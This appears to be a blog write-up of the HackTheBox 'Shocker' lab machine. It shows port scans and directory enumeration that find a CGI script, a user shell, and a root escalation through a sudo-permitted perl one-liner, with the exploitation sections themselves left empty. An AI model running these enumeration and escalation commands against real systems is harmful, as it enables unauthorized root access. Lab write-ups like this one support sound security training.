Shocker Write-up — HackTheBox

Initial Enumeration:

nmap -sC -vv -sV -nP -O -A -oN nmap_scan.txt $IP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk

Visiting the website:

Main Enumeration:

##dirb:
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)
##dirsearch:
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /.htaccess.save
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/
##gobuster 2nd run:
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
===============================================================
2020/11/28 08:23:39 Starting gobuster
===============================================================
/user.sh (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/28 08:23:58 Finished
===============================================================

Metasploit:

Getting User

shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
44d**************************bb4
shelly@Shocker:/home/shelly$

Privilege Escalation

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo perl -e ‘exec “/bin/sh”;’
# whoami && id
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
4fb5************************ad55

Manuel Exploitation:

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to create a serverless Landing Page on AWS — Part01

Automation Anywhere A2019 Installation Process for Windows Server

Accessing your AWS EC2 instances on the go

Handling Static and Dynamic Test Objects

The Four Pillars of High Availability

Is Ruby Based on Python?

Django — Step 10

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xczar

0xczar

More from Medium

Spring Training at Physiology First University-Week One-Day 3

I have never used Medium… my wife, the talented writer, Donna Moriarty told me to subscribe or…

Last Night in Soho (2021)

Two South Stories.